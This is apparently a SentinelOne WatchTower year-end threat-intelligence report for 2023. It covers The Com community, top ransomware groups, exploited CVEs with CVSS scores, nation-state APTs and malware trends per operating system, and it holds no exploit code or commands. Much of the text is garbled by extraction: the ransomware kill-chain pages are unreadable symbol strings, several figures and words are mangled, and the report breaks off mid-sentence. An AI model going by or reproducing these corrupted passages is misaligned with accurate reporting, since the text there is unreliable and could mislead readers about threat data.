##### Intelligence-Driven Threat Hunting ### END OF YEAR 2023 ----- #### Table of Contents Letter from the Editor **3** Executive Summary **4** 2023 WatchTower Recap **4** Most Impactful Threat Actor of 2023 - The Com **5** Top Ransomware Groups of 2023 **7** 2023 Monthly Ransomware Activity **8** Top Vulnerabilities Exploited in 2023 by Human Operated Ransomware Groups **9** A Kill Chain Review of the Top 5 Ransomware Groups **10** Top News from the Ransomware Landscape in 2023 **12** Top 10 Countries Targeted by Cyber Attacks in 2023 **16** Top 5 Industries Targeted by Cyber Attacks in 2023 **17** Rise in State-Sponsored Attacks **18** Most Active Nation-State APTs of 2023 **18** Top Threats of 2023 by Operating System **19** Top 5 Vulnerabilities Exploited in 2023 **22** Top MITRE Techniques **24** Top Off-the-Shelf Tools Abused in 2023 **25** Top Malicious File Types (Excluding PE files) **26** Most Abused File Sharing Platforms **26** Most Abused LOLbins **27** Most Used Cross-Platform Programming Languages for Malware **28** DLL Side-Loading Attacks Remain a Favorite in 2023 **29** Top Vulnerable Drivers Targeted by Attackers **30** EDR Bypass Tools and Techniques in 2023 **30** 2023 Infostealer Ecosystem Overview **31** Top Stories from 2023 **33** About WatchTower **51** ###### Before You Get Started... The WatchTower monthly digest is a summary of our findings from hunts performed over the previous month. Impacted customers will be notified separately by the Vigilance team with courses of action for triage, investigation, and remediation. This report contains sensitive information with the TLP:AMBER classification. This includes specific IOCs, TTPs, case studies and campaign analysis drawn from SentinelOne. This information should be kept confidential and protected from potential threat actor access. As such, this version is provided only [to SentinelOne Vigilance and WatchTower customers. Please click here to explore WatchTower services.](https://www.sentinelone.com/global-services/watchtower/) ----- #### Letter from the Editor 2023 was a tumultuous year in cyber crime. We saw globally impactful attacks, followed by law enforcement takedowns, and reincarnations of once-defeated threat actor groups. We saw clever new pivots in malware capabilities, threat actor TTPs, and massively widespread zero-day exploits; and through it all, WatchTower was there. WatchTower, SentinelOne’s Threat Hunting and Intelligence arm, is composed of globally distributed security researchers and intelligence analysts working continually to understand the ever evolving cyber threat landscape. We take advantage of threats identified on our globally deployed endpoints, as well as open source / darkweb threat research, and we work closely with our Vigilance MDR and DFIR teams to understand threat actor modus operandi in detail. All of this allows us to both respond extremely rapidly to new threats and be predictive in our threat hunting. At the end of the day, our mission is to protect our clients with industry-leading threat hunting, threat intelligence, and risk identification and mitigation. 2023 was a remarkable year for WatchTower. In October we officially relaunched our service with an amazing new set of capabilities that include: 24/7 Real-time threat hunting, investigation, and containment Integration of machine learning and AI into our threat hunting algorithms Massively expanded intelligence sources for additional Atomic IOC and Behavioral IOC hunting Expanded telemetry by automating host-based YARA and forensic artifact collection for hunt finding verifications Greatly expanded Linux, OSX, and Cloud behavioral hunting libraries Further, WatchTower Pro, our combined compromise/risk/security assessment and threat hunting service, expanded engagements by 3X with 100% customer retention. With WatchTower Pro, we help our clients identify risks from both within their environment and vulnerable paths into their network that threat actors can target. Together, this growth truly made 2023 the year of WatchTower, and we’re so grateful to have you on this journey with us. Throughout our work over this past year, we’ve collected a wide array of metrics and stories that we are thrilled to share with you. I would like to thank our contributors to this year-end report, to include: Lead Author: Niranjan Jayanand Contributors: Tanmay Barhale, Rohit Chaturvedi, Dinesh Devadoss, Rahul R, Nithya Menon, Matt Weikert We wish you a very Happy 2024, and as always, Happy Hunting. **Brian Hussey** VP Threat Hunting, Intelligence & DFIR ----- #### Executive Summary In this special year-end edition of the WatchTower Digest, we discuss the threats we observed and investigated in 2023, and look ahead to the 2024 threat landscape. Our findings are based on SentinelOne's Singularity telemetry across tens of millions of endpoints, operating across a diverse number of industries and global geographies. This edition of WatchTower includes: A comprehensive review of the top cyber attacks in 2023 A look at the top threats across Windows, Mac, and Linux environments Original insights into major vulnerabilities, cyber crime toolkits, and human-operated ransomware groups Ransomware group disruptions and reincarnations in 2023 An overview of the most prevalent commodity crime toolkits, shared loader and APT groups in 2023 Coverage of the first double supply chain attack Coverage of a rise in state-sponsored attacks Coverage of a rise in multiple vulnerabilities abused in second half of 2023 for targeted attacks Predictions on the top cybersecurity threats of 2024 #### 2023 WatchTower Recap ###### 1,400+ Total Hunting Queries Shared, Created, and Enriched ###### 270+ Total Flash Reports Published ###### 1,500+ Total Pages of Threat Intelligence Shared ###### 10+ Million Atomic & Behavioral IOC's Hunted ###### 50+ Vulnerability Exploitation Campaigns Tracked ###### 200+ Participation in Active Investigations ###### 10's of Millions of Atomic IOCs Processed ###### 20+ First Finder Reports and 2 Mac Threat Blogs ###### 300+ Total Malware Families Tracked and 60+ Total Ransomware Groups Tracked ----- The Com - A Visualization #### Most Impactful Threat Actor of 2023 - The Com Beginning in 2022 and throughout 2023, SentinelOne's Vigilance DFIR team observed multiple threat actors that stem from the same online community, which gave itself the name "The Com". Vigilance DFIR investigators collaborated closely with Allison Nixon, from UNIT 221B, to research the inner workings of this fascinating group of threat actors. TheCom, a clandestine online community, has recently come under scrutiny for its increasingly brazen activities. Composed of a diverse membership, including gamers, hackers, and recreational users, the group operates within Telegram chat servers, creating a wide-ranging ecosystem that spans hundreds of individuals. The Com's genesis is not confined to a specific genre or interest; instead, it serves as a loose umbrella for various subgroups and activities, ranging from gaming and meme-sharing to more sinister activities such as cybercrime and physical violence. The vague nature of The Com challenges conventional definitions, blurring the lines between a community, a criminal organization, and a subculture that recruits unsuspecting individuals into its ranks. Despite the seemingly innocuous nature of many interactions within the group, many have graduated from low-level crime, including SIM swapping, doxing, and social media account take-overs, to conducting some of the most high-profile network intrusion and ransomware cases in 2023. Many of these cybercrime incidents are also followed with threats of – or in some cases acts of – real-life violence, which are often carried out by other subgroups within The Com. The Com has been the birthplace of many cyber threat actors we hear of today, most notably: LAPSUS$, Star Fraud (Octo Tempest, UNC3944, Muddled Libra, Scattered Spider), and many others. FBH ACG ChucklingSquad PearsonSquad SquadBrick RR Kaskar **The Com** GangSplur FraudStar 764 LAPSUS$ CVLT ViLE/ Doxbin And many more The Com is deeply involved in cybercrime, with a historical focus on tactics such as gaining access to BPOs (Business Processing Organizations) to perform SIM swaps. SIM swapping is the process of activating a mobile phone number to a new line of service on a new physical device. Performing SIM swaps allows threat actors within The Com to gain unauthorized access to individuals' cryptocurrency accounts or bypass MFA solutions for corporate network access. More recently, The Com has adapted its approach in its pursuit of financial crimes by evolving its SIM swapping tactics to socially engineering workers into deploying malware and ransomware within victim networks. The evolution of SIM swapping tactics to socially engineer workers into deploying malware and ransomware within networks, highlights the adaptability of The Com in its pursuit of financial crimes. FBH ACG ChucklingSquad PearsonSquad SquadBrick RR Kaskar **The Com** GangSplur FraudStar 764 LAPSUS$ CVLT ViLE/ Doxbin And many more ----- g g y p gi, y broader online security landscape. Beyond financial motivations, The Com's cyber activities contribute to the group's broader criminal endeavors, linking them to a nationwide epidemic of swatting calls targeting schools and universities. The FBI's recognition of The Com as a group of interconnected cybercriminal actors underscores the gravity of their cyber activities, prompting investigations into the extent of their involvement and the potential risks they pose to online and real-world communities. There was a major shift from the SIM swapping and BPO compromise tactics seen in 2022, when a notable group within The Com, known as Star Fraud, became an affiliate for the ALPHV/BlackCat ransomware group. This shift happened early in 2023, and quickly plagued organizations across multiple verticals. Phishing Emails ###### Compromise Credential Thef/Purchase MFA Bombing/Fatigue VPN Usage ###### Persistence Remote Access Tools Download Tools from Transfer States Ransomware Deployment ###### Action on Objectives SIM Swapping → Crypto Thef Data Exfiltration Tracking this group by tools and TTPs alone can be difficult. After gaining access to networks, SentinelOne observed The Com threat actors using free and open-source tooling that is readily available to the general public. Most of these come in forms or remote access and tunneling tools that may or may not be used legitimately by users within victim environments. Below is a sampling of legitimate tools used by Star Fraud. Phishing Emails ###### Compromise Credential Thef/Purchase MFA Bombing/Fatigue VPN Usage ###### Persistence Remote Access Tools Download Tools from Transfer States Ransomware Deployment ###### Action on Objectives SIM Swapping → Crypto Thef Data Exfiltration ----- #### Top Ransomware Groups of 2023 WatchTower tracked hundreds of ransomware groups active throughout 2023. The graphic below shows both the prevalence (frequency of global attacks) and Profit Score (Average ransom size). It should, however, be noted that Lockbit is represented out of scale. In actuality, Lockbit was 3.5X more active than its closest competitor. It is also interesting to note that MalasLocker's profit score was evaluated the same as all of the other threat actors, even though technically they demand payment be sent to charities rather than to line their own pocketbooks. While this Robin Hood approach may initially sound philanthropic, in reality it is just another ransomware threat actor illegally demanding payment from innocent victims. ----- #### 2023 Monthly Ransomware Activity The chart below shows the aggregated monthly activity of all ransomware groups tracked by WatchTower. While January and February started slow, things quickly picked up, with May being the most active month for Ransomware Threat Actors in 2023. ###### 2023 Ransomware Monthly Targeted Attacks (All Threat Actors) 600 Peak 400 Average 200 Low 0 Jan Feb Mar Apr May Jun Jul Aug Sep Oct Nov Dec Tracking the top 10 Ransomware groups monthly activity paints an interesting picture. Clearly Lockbit continually rules the ransomware threat landscape. However, some families like MalasLocker made the top 10 via an extremely busy May, with only minor activity tracked throughout the remaining months of the year. Akira and 8Base conducted negligible activity early in the year but got seriously busy once spring arrived. ----- #### Top Vulnerabilities Exploited in 2023 by Human Operated Ransomware Groups WatchTower hunters worked closely with SentinelOne's DFIR, MDR, and R&D teams in 2023 to track and investigate vulnerabilities that threat actors exploited to gain initial access in 2023. WatchTower Threat Hunting customers can access detailed reports on each of these vulnerabilities and their kill chains. [WatchTower would like to thank @BushidoToken for their original research posted here. We incorpo-](https://twitter.com/BushidoToken/status/1738223234389291079) rated this research to help drive our hunting operations throughout 2023. ###### Ransomware Zero Days in 2023 CL0PCLiP Magniber Nokoyawa Storm-0978/Stormlijphk RomCom GoAnywhere PaperCut MOVEitMOVEitMO�Eit SysAidSysAidSysAid Windows Windows MS OffiMS Ofce SmartScreenSmartScreen CLFS LockBit Akira NoEscape MedusaMedusaMedusa Hunters Hunters Hunters ALPH�5 ALPHV/ ALPH�5 Black[uitBlackSuit PLA?PLAY International BlackCat Cisco ASACiscoPASA CitrixCitri� Microso�Microsof NetScalerNetScale� ExchangeExchange ”Citrixbleed” Cl0p Abused FTA Vulnerabilities Multiple Vulnerabilities In NetScaler Gateway and ADC (CVE-2023-3519, CVE-2023-3466, CVE-2023-3467, and CVE-2023-4966) Akira Targets Cisco ASA Vulnerability (CVE-2023-20269) Akira Continues to Abuse Cisco VPN Vulnerability to Achieve Initial Access Akira Ransomware Exploits Cisco VPN Vulnerability and TTP Update Microsoft Exchange Server Vulnerabilities Exploited To Drop Play Ransomware Buhti Ransomware Exploits PaperCut Vulnerability RomCom Actors Abuse CVE-2023-36884 SysAid Vulnerability (CVE-2023-47246) Abused in Targeted Attack Confluence Vulnerability (CVE-2023-22518) Leads to Ransomware Infection Cl0p Ransomware Vulnerability Exploitation Update Magniber Ransomware Exploits SmartScreen Vulnerability Human-Operated Ransomware Groups Exploit Recent Apache ActiveMQ Vulnerability LockBit Akira NoEscape MedusaMedusaMedusa Hunters Hunters Hunters ALPH�5 ALPHV/ ALPH�5 Black[uitBlackSuit PLA?PLAY International BlackCat Cisco ASACiscoPASA CitrixCitri� NetScalerNetScale� ”Citrixbleed” Windows SmartScreenSmartScreen CL0PCLiP MS OffiMS Ofce ----- #### A Kill Chain Review of the Top 5 Ransomware Groups q�� q�� q3� q~�� �$������������ ��������$ =�������$�� =������������������$ ���������������� ���������������������P� �s���������/��� ����������/� �������������}� ����������� �����������P���/�������� �E��������������P�r ������������ ����������/���� E���/���� ������������/����������f ������r�f����������� ��[��[��P�������P�� ����������������������� �E������������������:�� �/����������f q�� q�� q6� q~� ����$���������$ ��������� A�������@���B�$�= ���������������$ ��������� ������������������ <�B���������� �E������:��- ���������� ������������}�������� ���f���W �)�������f ������������������ ���������������������� �������������� �)���)����f�v ��������� ������[�/�- ���������P�]� �����P�� ���E� ��������� ����P����������Z ������f����:��- ����/���� ���������������:���� ��������� ���P��f�v ���:������ ������� ���E��v ������/�j ��������������� ���)��� ��P��W ��������� ����������� �������������� �����:���)�� ������[��j ������� �����s��:�� �q����� ��[/�����[��� ��������� ����[�c��� q�� ��������������$�� ������������� �Q�/��F ��:K���f���0 ��������}� ��E������? ���+*��� �)J; �f��� ���+*��� �����r����:�/H ��&������ ��}&���9 ����:����}�� ���r�����! ��E������? �����'�� �� �)���:�H ����:�*�+}��:�:�����:� ��� ��)��:���H ������r q6� A�������@���B�$�= <�B���������� ���f���W �������������� ���������P�]� ����P����������Z ��������� ���E��v ��P��W �������������� ������[��j �����s��:�� ��[/�����[��� ����[�c��� q~� ���������������$ �E������:��- �)�������f �)���)����f�v �����P�� ������f����:��- ���P��f�v ������/�j ��������� �����:���)�� ������� �q����� ��������� ----- ###### $"! � q�� q�� q>� qW�� �$������������ ��������$ H�������$�� H������g�����������$ ���������������� �:��������������������� �������/�������� �/�����:���� �������������� ����������� �W������w ��f������/:��f��������� �������������������������� ��������������0 �W����r��[������� ���������:�s ������������}� �[��������������������� �������/������� ����r�f�������[� }�����������r��� ������������������� ���������[������ �����������������������f �����������P����E����� [����������������� ��������������:�������� ���/�������� ������������������ q�� q�� q?� q�� ����$���������$ ��������� J�������I���K�$�F ���������������$ ������������������� �/��������'��[������ D�K���������� �����[f��� �������� �/�����0 �|����� �������� �[��f��� �������) ��������� �����P�� �����/�� �/����4 ����������� �|�f����� ����������� ��������� ������p �����/�[������ ������������[������ ���r������ �'������� :��f������� ������������� ������������ ����:�d ������� ������������f����� �[����������}��r���� ��������0 �[������� [��r���� [������ �:������[����) ��������� ������������������� �����/���0 �:��w �/�f���g �:������W��) ������������f����� [��r���� ������������������w �[�����:������� �/����/����� �[�������� q?� J�������I���K�$�F D�K���������� �|����� ��������� ����������� ������p �'������� ����:�d ��������0 �:������[����) �����/���0 �:��w �/�f���g �:������W��) ������������f����� [��r���� ������������������w �[�����:������� �/����/����� �[�������� q�� %�������#���&�$� ��&���������� ��VDTN����:�������� �P���� �����6�B�����5 �������������� ����:������//�������� ����������B�� ���D�1 �V���������� qY� ������^\�������$ �f�����1 �������������������n� �P����� ����:�����//�������� ����������B�� ----- ###### ���� q�� qz� q�� q#�� �$������������ �Y������$ ��������$�� �������2�����������$ ����������������������� ������������� ��������������r �h�����> ����������� ��[�������P���[�[���� ���f���=��[�A���} ��������}�rf���� ��������� �[�������E�}�:� ��?r���/� �P�����������rr�/[�f�[r q�� q�� q � qU� ����$���������$ ��������� +�������*���,�$�' ������YW�������$ ������ ������� &�,���������� �����f��l �P�/��� ��[����� ����������[�f�� ��[����� �����[����� �/��������� ��?r���/M �h����� ������������� �����r� ��r���9 ��[�������P���[�[���[ ����r��� �����@ �����[r���������[� q�� ��������� ������� ��[����� �/��������� �����r� ����r��� q�� ����$���������$ ������ �P�/��� �����[����� ������������� ��[�������P���[�[���[ #### Top News from the Ransomware Landscape in 2023 ###### Forty countries joined a United States-led alliance signing a pledge to not pay cybercriminal ransoms in an effort to eliminate hackers' funding mechanisms. The average ransomware payout cost has surged to $1.6 million compared to the previous year's average of over $272,000. 43% of surveyed companies confirmed paying the ransom. ###### ALPHV went beyond extortion and filed a SEC (U.S. Securities and Exchange Commission) complaint. [The SEC requires public companies to disclose cybersecurity breaches within four days. ALPHV is the](https://www.sec.gov/files/rules/final/2023/33-11216.pdf) first group to file SEC complaints after a successful intrusion because of victim non-payment. qU� ������YW�������$ �����f��l ��[����� �h����� ----- ###### An internationally coordinated initiative was launched by Europol and Eurojust aimed to disrupt the RagnarLocker ransomware group. The U.S. Department of Justice led an international coalition to Disrupt the Hive Ransomware Variant. ----- ###### Europol and Eurojust led international collaboration to disrupt a prolific ransom- ware group in Ukraine known to be heavy users of LockerGoga, MegaCortex, Hive and Dharma ransomware. U.S. Law enforcement successfully dismantled the Genesis Market. The operation, codenamed MEDUSA, yielded 119 arrests, 208 property searches and 97 knock and talks. Captured malware was linked to a unit within Center 16 of Russia's FSB The FBI created tool named PERSEUS caused the Snake malware to overwrite its own vital components. ----- ###### An FBI-led coalition seized the ALPHV/BlackCat Ransomware blog page in De- cember. Four days later, the threat actors launched an alternative site, which is still operational at the time of this publication. ----- #### Top 10 Countries Targeted by Cyber Attacks in 2023 Cybercrime is a global problem. No single country in the world is immune from being attacked. Here are the top 10 countries targeted by Cyber Attacks in 2023. 3 Canada U# 2 5 Germany France 6 4 Italy 1 USA Spain 8 India 1014 9 Brazil Australia 7 of all Global Cyber Ataccs tarreted the United States. This was 10x more than the UK, the second closest competitor. # 54[%] The chart below shows the monthly breakdown of attacks experienced by the top 10 targeted countries of 2023. 3 Canada U# 2 5 Germany France 6 4 Italy 1 USA Spain 8 India 1014 9 Brazil Australia 7 of all Global Cyber Ataccs tarreted the United States. This was 10x more than the UK, the second closest competitor. # 54[%] ----- #### Top 5 Industries Targeted by Cyber Attacks in 2023 The most targeted industries in 2023 are shown below. Some key factors in an attacker's choice to target specific industries include: 1. The importance of their data and reputation. 2. The potential willingness to pay a ransom. 3. The overall state of the target’s security posture. 1. **Manufacturing - 20.5%** 2. **IT/Engineering/Tech - 14.4%** 3. **Finance - 12.0 %** 4. **Healthcare - 9.4 %** 5. **Education - 8.0 %** 6. **Others - 35.7%** Top Targeted Industries - 35.7% Manufacturing 20.5% Others 35.7% Finance 12.0% Healthcare 9.4% Education 8.0% IT/Engineering 14.4% ----- #### Rise in State-Sponsored Attacks China, Russia, North Korea, and Iran have developed some of the most sophisticated and comprehensive cyber tradecraft that governments and businesses have to battle today. Nation-states, driven by political agendas, have harnessed cyber espionage as a powerful tool to gather intelligence, influence events, and undermine rivals. Over the years, there have been many reported cases of government agencies, energy grids, financial institutions, and healthcare systems falling prey to targeted attacks, jeopardizing both economic stability and public safety Cyber espionage's impact on the global economy has redefined the dynamics of trade, innovation, and security. Businesses lose billions annually when intellectual property is compromised and the increasing number of supply chain attacks disrupt manufacturing and distribution networks to an alarming degree. Nation-states exploit digital vulnerabilities to influence elections, gather classified intelligence, and disrupt rival activities. This has blurred the traditional boundary between physical and virtual warfare and reshaped power dynamics in the cyber arena, allowing smaller nations to wield disproportionate influence far beyond their physical borders. Supply Chain Compromises – Attacks against SolarWinds, 3CX, Kaseya affected thousands of organizations, including U.S. government agencies, demonstrating the vulnerability of global supply chains. #### Most Active Nation-State APTs of 2023 1. **Red Delta (China)** - Red Delta is a China-based cyber espionage threat actor that was first observed in 2017 but may have been conducting operations since at least 2014. This group has targeted government entities, nonprofits, religious, and other non-governmental organizations in the U.S., Europe, Mongolia, Myanmar, Pakistan, and Vietnam, among others 2. **Lazarus (North Korea)** - Lazarus Group is a North Korean state-sponsored cyber threat group that has been attributed to the Reconnaissance General Bureau. This group is believed to be responsible for the 3CX supply chain attack. 3. **OilRig (Iran)** - OilRig is a suspected Iranian threat group that has targeted Middle Eastern and international victims since at least 2014. The group has targeted a variety of sectors, including financial, government, energy, chemical, and telecommunications. 4. **Sandman (China)** - Sandman APT is likely associated with suspected China-based threat clusters known to use the KEYPLUG backdoor, in particular a cluster jointly presented by PwC and Microsoft at Labscon 2023 – STORM-0866/Red Dev 40. 5. **Arid Viper (Palestine)** - Arid Viper is an espionage-motivated cyber threat actor with Hamasaligned interests. Arid Viper's toolkit is multi-platform and includes the consistent use and development of mobile spyware since emerging in 2017. Increased industry focus on Arid Viper is an extension of our continuing collective efforts to track threat actors engaged in the Israel-Hamas war. ----- #### Top Threats of 2023 by Operating System ###### Windows There was no reduction in Windows malware and loaders in 2023. Many commodity loaders were polymorphic (change their hash on every execution) and supported attackers' hands-on-keyboard activities for information gathering, disabling security settings, and forging the way for ransomware attacks. 1. **Pikabot - A loader malware that demonstrates advanced techniques with evasion,** injection, and anti-analysis, and supports various options for C2 communication and second stage injection. The Pikabot loader displayed increased activity when Qakbot operations were taken down. Pikabot showed continually increasing activity throughout the year and is still on the rise. 2. **SocGholish - SocGholish is a downloader that uses JavaScript to download files via** HTTP and writes the payloads to disk before launching them. 3. **GootLoader - A first stage malware that is based on JavaScript and commonly uses SEO** poisoning and compromised websites to trick victims into downloading a ZIP archive. 4. **SolarMarker - A malware family that is known for stealing information and creating** backdoors, and is typically spread through search engine optimization (SEO). 5. **Raspberry Robin - The Raspberry Robin worm, also known as the QNAP worm or LNK** worm, is a worm that installs from infected removable drives. The chart below shows the comparative prevalence rates of the top 5 malware families seen targeting Windows in 2023. Pikabot was the clear leader. Raspberry Robin, while only representing 3% of attacks seen from the top five families, was the fastest growing variant in the latter half of 2023, and should be closely watched as we enter 2024. closely watched as we enter 2024. Raspberry Robin 3% SolarMarker 8% GootLoader 8% SocGholish 16% Pikabot 65% ----- ###### Linux We have observed multiple botnets (Mirai, Mirai-related variants, and BASHLITE), multiple crypto-jack[ing campaigns (Kinsing, XMRig), usage of rootkits in multiple campaigns such as the Krasue campaign,](https://community.sentinelone.com/community/sfc/servlet.shepherd/version/download/068Tc000001MMZDIA4) which uses a rootkit to hide itself. We also witnessed a significant increase in LinPEAS usage and usage [of webshells in campaigns like Teal Kurma where a webshell named SnappyTCP was deployed. There](https://community.sentinelone.com/community/sfc/servlet.shepherd/version/download/068Tc000001M8O9IAK) has also been an increase in ransomware attacks targeting Linux environments. Here is a list of the top malware families targeting Linux environments: 1. **Mirai - In 2023, Mirai continues to be one of the most seen botnets. Mirai is known to** exploit IOT devices and launch large-scale distributed DDoS attacks. 2. **BASHLITE - BASHLITE (also known as Lizkebab and Gafgyt) is a botnet which spreads** by using vulnerabilities in devices with weak security. 3. **XMRig - XMRig is an open source software to mine Monero cryptominer. It has been** continuously used in crypto-jacking campaigns for unauthorized mining activities. 4. **Kinsing - Kinsing (h2miner) is known to target Kubernetes, and has been found** exploiting CVE-2023-4911 (Looney Tunables). 5. **Ares - Ares is an open source Remote Access Tool which is also used in SideCopy** campaigns delivering Ares to Linux endpoints. Kinsing 0.5% Ares 0.4% XMRig 15.7% BASHLITE 14.7% Mirai 68.7% ----- ###### Mac Threat actors have begun using more sophisticated social engineering techniques to compromise Mac [users. Earlier in 2023, WatchTower observed RustBucket malware targeting organizations with spe-](https://www.sentinelone.com/blog/bluenoroff-how-dprks-macos-rustbucket-seeks-to-evade-analysis-and-detection/) cially crafted applications that victims were persuaded into executing as part of an elaborate social engineering scheme. Threat actors engaged victims with the promise of a business deal and shared ‘confidential' PDF documents that could not be read by ordinary PDF viewer software. Such software application names were used to masquerade malicious or unwanted programs among the top Mac threats in 2023. 1. **AdLoad -AdLoad is one of several widespread adware and bundleware loaders currently** afflicting macOS. 2. **Bundlore - Bundlore is adware written for macOS that has been in use since at least** 2015. Though categorized as adware, Bundlore has many features associated with more traditional backdoors 3. **AtomicStealer - This infostealer can grab account passwords, browser data, session** cookies, and crypto wallets. 4. **Pirrit - Pirrit is a piece of adware and browser hijacker with the aim of making money** through search redirections. 5. **Proxy Agents - Bundlore delivers these agents, which act as a proxy for attackers to** carry out their malicious activity. AtomicStealer 0.9% Pirrit 0.7% Proxy Agent 0.3% Bundlore 4.8% AdLoad 93.2% ----- #### Top 5 Vulnerabilities Exploited in 2023 In 2023, we continued to see some attackers use old vulnerabilities to gain access to exposed environments. We also saw multiple new CVEs abused by attackers that caused a major global impact. Below are the top 5 new CVEs abused in 2003, followed by a collection of other highly impactful vulnerabilities from the previous year. [1. Microsoft Exchange Server (CVE-2021-34473, CVE-2021-31207, CVE-2021-34523)](https://nvd.nist.gov/vuln/detail/CVE-2021-34473) [2. Progress MOVEit Transfer SQL Injection Vulnerability (CVE-2023-34362)](https://nvd.nist.gov/vuln/detail/CVE-2023-34362) [3. PaperCut MF/NG Improper Access Control Vulnerability (CVE-2023-27350, CVE-2023-27351)](https://nvd.nist.gov/vuln/detail/CVE-2023-27350) [4. Log4Shell (CVE-2021-44228)](https://nvd.nist.gov/vuln/detail/cve-2021-44228) [5. RCE vulnerability n the equation editor from the Microsoft Office (CVE-2017-11882)](https://nvd.nist.gov/vuln/detail/cve-2017-11882) ###### Other top CVEs seen exploited in 2023 are listed below: [VMware Workspace ONE Access & Identity Manager (CVE-2022-22954, CVE-2022-22960)](https://nvd.nist.gov/vuln/detail/CVE-2022-22954) Remote code execution vulnerability in the Windows Object Linking and Embedding (OLE) [interface of Microsoft Office (CVE-2017-0199)](https://nvd.nist.gov/vuln/detail/cve-2017-0199) [Follina vulnerability (CVE-2022-30190)](https://nvd.nist.gov/vuln/detail/CVE-2022-30190) [Fortinet FortiOS & FortiProxy (CVE-2018-13379)](https://www.fortiguard.com/psirt/FG-IR-18-384) [Zoho ManageEngine ADSelfService Plus (CVE-2021-40539)](https://nvd.nist.gov/vuln/detail/CVE-2021-40539) [Atlassian Confluence Server & Data Center (CVE-2021-26084, CVE-2022-26134)](https://nvd.nist.gov/vuln/detail/CVE-2021-26084) [F5 Networks BIG-IP (CVE-2022-1388)](https://nvd.nist.gov/vuln/detail/CVE-2022-1388) [Microsoft Windows Search Remote Code Execution Vulnerability (CVE-2023-36884)](https://nvd.nist.gov/vuln/detail/CVE-2023-36884) [Barracuda Networks ESG Appliance Improper Input Validation Vulnerability (CVE-2023-2868)](https://nvd.nist.gov/vuln/detail/CVE-2023-2868) [RARLAB WinRAR Code Execution Vulnerability (CVE-2023-38831)](https://nvd.nist.gov/vuln/detail/CVE-2023-38831) Cisco Adaptive Security Appliance and Firepower Threat Defense Unauthorized Access Vulnera[bility (CVE-2023-20269)](https://nvd.nist.gov/vuln/detail/CVE-2023-20269) .NET deserialization vulnerability in WS_FTP Server versions prior to 8.7.4 and 8.8.2 [(CVE-2023-40044)](https://nvd.nist.gov/vuln/detail/CVE-2023-40044) [Citrix NetScaler ADC and NetScaler Gateway Buffer Overflow Vulnerability (CVE-2023-4966)](https://nvd.nist.gov/vuln/detail/CVE-2023-4966) [Path traversal vulnerability SysAid On-Premise before 23.3.36 (CVE-2023-47246)](https://nvd.nist.gov/vuln/detail/CVE-2023-47246) [Citrix NetScaler ADC and NetScaler Gateway Code Injection Vulnerability (CVE-2023-3519)](https://nvd.nist.gov/vuln/detail/CVE-2023-3519) [JetBrains TeamCity Authentication Bypass Vulnerability (CVE-2023-42793)](https://nvd.nist.gov/vuln/detail/CVE-2023-42793) [Apache Struts vulnerability (CVE-2023-50164)](https://nvd.nist.gov/vuln/detail/CVE-2023-50164) [VMware vCenter Server Out-of-Bounds Write Vulnerability (CVE-2023-34048)](https://nvd.nist.gov/vuln/detail/CVE-2023-34048) [Remote code execution vulnerability in the Apache ActiveMQ (CVE-2023-46604)](https://nvd.nist.gov/vuln/detail/CVE-2023-46604) ----- g y p y p, p exploitation kill chain details etc to know more. [6. Atlassian Confluence Data Center and Server Broken Access Control Vulnerability (CVE-2023-22515)](https://nvd.nist.gov/vuln/detail/CVE-2023-22515) [7. Atlassian Confluence Data Center and Server Improper Authorization Vulnerability (CVE-2023-22518)](https://nvd.nist.gov/vuln/detail/CVE-2023-22518) ###### Heat Map Legend |Severity|Score Range| |---|---| |Low|0.1-3.9| |Medium|4.0-6.9| |High|7.0-8.9| |Critical|9.0-10.0| |Heat Map|Col2|Col3|Col4| |---|---|---|---| |CVSS Score|Base Score|Exploitability Subscore|Impact Subscore| |CVE-2021-34473|9.8|5.9|3.9| |CVE-2021-31207|6.6|5.9|0.7| |CVE-2021-34523|9.8|5.9|3.9| |CVE-2023-34362|9.8|5.9|3.9| |CVE-2023-27350|9.8|5.9|3.9| |CVE-2023-27351|7.5|3.6|3.9| |CVE-2021-44228|10|6|3.9| |CVE-2017-11882|7.8|5.9|1.8| |CVE-2022-22954|9.8|5.9|3.9| |CVE-2022-22960|7.8|5.9|1.8| |CVE-2017-0199|7.8|5.9|1.8| |CVE-2022-30190|7.8|5.9|1.8| |CVE-2018-13379|9.8|5.9|3.9| |CVE-2021-40539|9.8|5.9|3.9| |CVE-2021-26084|9.8|5.9|3.9| |CVE-2022-26134|9.8|5.9|3.9| |CVE-2022-1388|9.8|5.9|3.9| |CVE-2023-36884|7.5|5.9|1.6| |CVE-2023-2868|9.8|5.9|3.9| |CVE-2023-38831|7.8|5.9|1.8| |CVE-2023-20269|9.1|5.2|3.9| |CVE-2023-40044|8.8|5.9|2.8| |CVE-2023-4966|7.5|3.6|3.9| |CVE-2023-47246|9.8|5.9|3.9| |CVE-2023-3519|9.8|5.9|3.9| |CVE-2023-42793|9.8|5.9|3.9| |CVE-2023-50164|9.8|5.9|3.9| |CVE-2023-34048|9.8|5.9|3.9| |CVE-2023-46604|9.8|5.9|3.9| |CVE-2023-22515|9.8|5.9|3.9| |CVE-2023-22518|9.8|5.9|3.9| Low 0.1-3.9 Medium 4.0-6.9 High 7.0-8.9 Critical 9.0-10.0 ----- qi ``` Base Score is, The Base Score is a function of the Impact and Exploitability subscore ``` equations. Where the Base score is defined as, ``` If (Impact subscore <= 0) 0 else, Scope Unchanged4 Roundup(Minimum[(Impact + Exploitability), 10]) Scope Changed Roundup(Minimum[(1.08 × (Impact + Exploitability), 10]) ``` Impact subscore (ISC) is defined as, ``` Scope Unchanged 6.42 × ISCBase Scope Changed 7.52 × [ISCBase - 0.029] - 3.25 × [ISCBase - 0.02]15 Where, ISCBase = 1 - [(1 - ImpactConf) × (1 - ImpactInteg) × (1 - ImpactAvail)] Exploitability subscore is, 8.22 × AttackVector × AttackComplexity × PrivilegeRequired × UseInteraction ``` #### Top MITRE Techniques The MITRE ATT&CK Framework maps out attacker kill chain stages, giving security professionals a common language and point of reference. WatchTower hunters and SentinelOne forensic analysts investigated thousands of attempted attacks. Here are the most commonly used MITRE techniques of 2023: ----- #### Top Off-the-Shelf Tools Abused in 2023 Attackers often rely on off-the-shelf tools as key parts of their kill chain, not only because they are easily available, but also their usage appears legitimate and usually will not raise security alerts. During Watchtower investigations, we enrich our investigations with context around alerts generated when such tools are generated to narrow down the most likely malicious ones to support our hunting operations. ###### Kill Chain Break up Insights of Investigations from 2023 ----- #### Top Malicious File Types (Excluding PE files) Like previous years, WatchTower hunters continue to witness attackers choosing non-PE files to conduct their attacks. They may do this for many reasons, as it can 